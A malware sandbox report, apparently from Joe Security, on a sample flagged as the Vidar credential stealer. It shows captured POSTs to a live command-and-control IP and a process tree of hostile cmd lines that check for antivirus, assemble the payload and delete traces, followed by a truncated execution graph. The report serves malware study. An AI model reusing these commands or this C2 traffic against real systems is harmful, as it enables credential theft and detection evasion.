                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------GCAFCAFHJJDBFIECFBKECont
                                                                        Timestamp:2024-08-05 16:56:49 UTC
                                                                        Bytes transferred:158
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Timestamp:2024-08-05 16:56:49 UTC
                                                                        Bytes transferred:12
                                                                        Direction:IN
                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session ID:36
                                                                        Source IP:192.168.2.5
                                                                        Source Port:49749
                                                                        Destination IP:188.245.87.202
                                                                        Destination Port:443
                                                                        PID:748
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp:2024-08-05 16:56:49 UTC
                                                                        Bytes transferred:325
                                                                        Direction:OUT
                                                                        Data:POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 465
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        Timestamp:2024-08-05 16:56:49 UTC
                                                                        Bytes transferred:465
                                                                        Direction:OUT
                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------CGDHIEGCFHCGDGCAECBGCont
                                                                        Timestamp:2024-08-05 16:56:50 UTC
                                                                        Bytes transferred:158
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Timestamp:2024-08-05 16:56:50 UTC
                                                                        Bytes transferred:12
                                                                        Direction:IN
                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session ID:37
                                                                        Source IP:192.168.2.5
                                                                        Source Port:49750
                                                                        Destination IP:188.245.87.202
                                                                        Destination Port:443
                                                                        PID:748
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp:2024-08-05 16:56:51 UTC
                                                                        Bytes transferred:325
                                                                        Direction:OUT
                                                                        Data:POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        Timestamp:2024-08-05 16:56:51 UTC
                                                                        Bytes transferred:331
                                                                        Direction:OUT
                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------JECAFHJEGCFCBFIEGCAECont
                                                                        Timestamp:2024-08-05 16:56:52 UTC
                                                                        Bytes transferred:158
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:52 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Timestamp:2024-08-05 16:56:52 UTC
                                                                        Bytes transferred:5
                                                                        Direction:IN
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID:38
                                                                        Source IP:192.168.2.5
                                                                        Source Port:49751
                                                                        Destination IP:188.245.87.202
                                                                        Destination Port:443
                                                                        PID:748
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp:2024-08-05 16:56:52 UTC
                                                                        Bytes transferred:325
                                                                        Direction:OUT
                                                                        Data:POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        Timestamp:2024-08-05 16:56:52 UTC
                                                                        Bytes transferred:331
                                                                        Direction:OUT
                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------DBKKFHIEGDHJKECAAKKECont
                                                                        Timestamp:2024-08-05 16:56:53 UTC
                                                                        Bytes transferred:158
                                                                        Direction:IN
                                                                        Data:HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:53 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Timestamp:2024-08-05 16:56:53 UTC
                                                                        Bytes transferred:5
                                                                        Direction:IN
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Target ID:0
                                                                        Start time:12:54:53
                                                                        Start date:05/08/2024
                                                                        Path:C:\Users\user\Desktop\lem.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\lem.exe"
                                                                        Imagebase:0x400000
                                                                        File size:863'224 bytes
                                                                        MD5 hash:BB74165A5EB382A47E26F4EFD8C2F151
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:12:54:56
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit
                                                                        Imagebase:0x790000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:12:54:56
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:12:54:57
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:tasklist
                                                                        Imagebase:0xc40000
                                                                        File size:79'360 bytes
                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:12:54:57
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                        Imagebase:0xcf0000
                                                                        File size:29'696 bytes
                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:12:54:57
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:tasklist
                                                                        Imagebase:0xc40000
                                                                        File size:79'360 bytes
                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:12:54:57
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                                                        Imagebase:0xcf0000
                                                                        File size:29'696 bytes
                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:12:54:58
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:cmd /c md 366791
                                                                        Imagebase:0x790000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:12:54:58
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:findstr /V "TrailersTractOffersVenezuela" Mines
                                                                        Imagebase:0xcf0000
                                                                        File size:29'696 bytes
                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:12:54:58
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:cmd /c copy /b Pending + Smith + Specifications + Resident 366791\M
                                                                        Imagebase:0x790000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:12:54:59
                                                                        Start date:05/08/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Wow64 process (32bit):true
                                                                        Commandline:366791\Gift.pif 366791\M
                                                                        Imagebase:0x2d0000
                                                                        File size:893'608 bytes
                                                                        MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2545299732.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 7%, ReversingLabs
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:12
                                                                        Start time:12:54:59
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:timeout 5
                                                                        Imagebase:0x910000
                                                                        File size:25'088 bytes
                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:16
                                                                        Start time:12:56:53
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit
                                                                        Imagebase:0x790000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:17
                                                                        Start time:12:56:53
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:18
                                                                        Start time:12:56:53
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:timeout /t 10
                                                                        Imagebase:0x910000
                                                                        File size:25'088 bytes
                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false


                                                                          Execution Graph

                                                                          Execution Coverage:13.1%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:20.6%
                                                                          Total number of Nodes:1523
                                                                          Total number of Limit Nodes:39
405e50 GetFileAttributesW CreateFileW 4842->4847 4844 402b10 4845 4030e3 4844->4845 4848 405f51 wsprintfW 4844->4848 4847->4844 4848->4845 4849 4029ff 4850 401553 19 API calls 4849->4850 4851 402a09 4850->4851 4852 40145c 18 API calls 4851->4852 4853 402a12 4852->4853 4854 402a1f RegQueryValueExW 4853->4854 4856 401a13 4853->4856 4855 402a3f 4854->4855 4859 402a45 4854->4859 4855->4859 4860 405f51 wsprintfW 4855->4860 4858 4029e4 RegCloseKey 4858->4856 4859->4856 4859->4858 4860->4859 4861 401000 4862 401037 BeginPaint GetClientRect 4861->4862 4863 40100c DefWindowProcW 4861->4863 4865 4010fc 4862->4865 4866 401182 4863->4866 4867 401073 CreateBrushIndirect FillRect DeleteObject 4865->4867 4868 401105 4865->4868 4867->4865 4869 401170 EndPaint 4868->4869 4870 40110b CreateFontIndirectW 4868->4870 4869->4866 4870->4869 4871 40111b 6 API calls 4870->4871 4871->4869 4872 401f80 4873 401446 18 API calls 4872->4873 4874 401f88 4873->4874 4875 401446 18 API calls 4874->4875 4876 401f93 4875->4876 4877 401fa3 4876->4877 4878 40145c 18 API calls 4876->4878 4879 401fb3 4877->4879 4880 40145c 18 API calls 4877->4880 4878->4877 4881 402006 4879->4881 4882 401fbc 4879->4882 4880->4879 4884 40145c 18 API calls 4881->4884 4883 401446 18 API calls 4882->4883 4886 401fc4 4883->4886 4885 40200d 4884->4885 4887 40145c 18 API calls 4885->4887 4888 401446 18 API calls 4886->4888 4889 402016 FindWindowExW 4887->4889 4890 401fce 4888->4890 4894 402036 4889->4894 4891 401ff6 SendMessageW 4890->4891 4892 401fd8 SendMessageTimeoutW 4890->4892 4891->4894 4892->4894 4893 4030e3 4894->4893 4896 405f51 wsprintfW 4894->4896 4896->4893 4897 402880 4898 402884 4897->4898 4899 40145c 18 API calls 4898->4899 4900 4028a7 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028b1 4901->4902 4903 4028ba RegCreateKeyExW 4902->4903 4904 4028e8 4903->4904 4911 4029ef 4903->4911 4905 402934 4904->4905 4906 40145c 18 API calls 4904->4906 4907 402963 4905->4907 4910 401446 18 API calls 4905->4910 4909 
4028fc lstrlenW 4906->4909 4908 4029ae RegSetValueExW 4907->4908 4912 40337f 37 API calls 4907->4912 4915 4029c6 RegCloseKey 4908->4915 4916 4029cb 4908->4916 4913 402918 4909->4913 4914 40292a 4909->4914 4917 402947 4910->4917 4918 40297b 4912->4918 4919 4062a3 11 API calls 4913->4919 4920 4062a3 11 API calls 4914->4920 4915->4911 4921 4062a3 11 API calls 4916->4921 4922 4062a3 11 API calls 4917->4922 4928 406224 4918->4928 4924 402922 4919->4924 4920->4905 4921->4915 4922->4907 4924->4908 4927 4062a3 11 API calls 4927->4924 4929 406247 4928->4929 4930 40628a 4929->4930 4931 40625c wsprintfW 4929->4931 4932 402991 4930->4932 4933 406293 lstrcatW 4930->4933 4931->4930 4931->4931 4932->4927 4933->4932 4934 402082 4935 401446 18 API calls 4934->4935 4936 402093 SetWindowLongW 4935->4936 4937 4030e3 4936->4937 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 
3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 
